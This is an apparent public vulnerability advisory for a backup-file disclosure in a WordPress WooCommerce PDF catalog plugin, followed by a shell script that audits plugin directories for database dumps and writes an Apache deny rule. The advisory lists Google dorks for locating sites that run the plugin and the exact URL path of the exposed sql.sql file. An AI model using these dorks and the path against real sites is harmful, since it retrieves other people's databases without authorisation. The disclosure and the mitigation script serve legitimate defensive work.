#################################################################################################
# Exploit Title : WordPress PDF Catalog for WooCommerce Plugin 1.1.18 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 08/12/2018
# Vendor Homepage : ovologics.com ~ wordpress.org/plugins/pdf-catalog-for-woocommerce/
# Software Download Link : downloads.wordpress.org/plugin/pdf-catalog-for-woocommerce.zip
+ codecanyon.net/item/pdf-product-catalog-for-woocommerce/7874949
+ github.com/wp-plugins/pdf-catalog-for-woocommerce
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.1.18
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/pdf-catalog-for-woocommerce/''
+ intext:''Developed by PMS (PVT). LTD''
+ intext:''Developed by Jasa SEO Bandung''
+ intext:''A(c) 2017 Copyright mian junaid''
+ intext:''Powered by WebSmart'' site:za
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
# Admin Panel Login Path : /wp-login.php
# Exploit : /wp-content/plugins/pdf-catalog-for-woocommerce/pdf_data/templates/Additional%20service/sql.sql
#################################################################################################
# Example Vulnerable Sites =>
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
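The issue above is a database dump shipped inside a web-served plugin directory. As an added defender-side check that is not part of this advisory, the script below audits a WordPress document root for such dump files under wp-content/plugins and writes an Apache 2.4 rule that denies direct download of them; it assumes Apache with .htaccess overrides enabled, and the directory and file names used are placeholders, not the plugin's own code.

```shell
#!/bin/sh
# Audit a WordPress document root for database dumps left inside plugin
# directories and emit an Apache rule blocking web access to them.
# Assumptions (not from the advisory): Apache 2.4, .htaccess overrides on.

# Print every .sql / .sql.gz / .bak file below wp-content/plugins.
# Paths are printed one per line so names with spaces survive intact.
find_plugin_dumps() {
    find "$1/wp-content/plugins" -type f \
        \( -name '*.sql' -o -name '*.sql.gz' -o -name '*.bak' \) -print 2>/dev/null
}

# Number of dump files found under the given document root.
count_plugin_dumps() {
    find_plugin_dumps "$1" | wc -l | tr -d ' '
}

# Write an .htaccess fragment to the given path that denies direct
# download of dump and backup files for that directory and its children
# (drop it in wp-content so every plugin directory inherits it).
write_deny_rule() {
    cat > "$1" <<'EOF'
# Block direct web access to database dumps and backup files.
<FilesMatch "\.(sql|sql\.gz|bak)$">
    Require all denied
</FilesMatch>
EOF
}

# Usage: sh audit_dumps.sh /var/www/html  (placeholder document root)
if [ $# -gt 0 ]; then
    if [ "$(count_plugin_dumps "$1")" -gt 0 ]; then
        echo "Dump files reachable under the web root:"
        find_plugin_dumps "$1"
    else
        echo "No dump files under $1/wp-content/plugins"
    fi
fi
```

Finding a hit means the file is fetchable by anyone who knows its path; remove it from the web root and keep the deny rule in place for the next plugin that ships one.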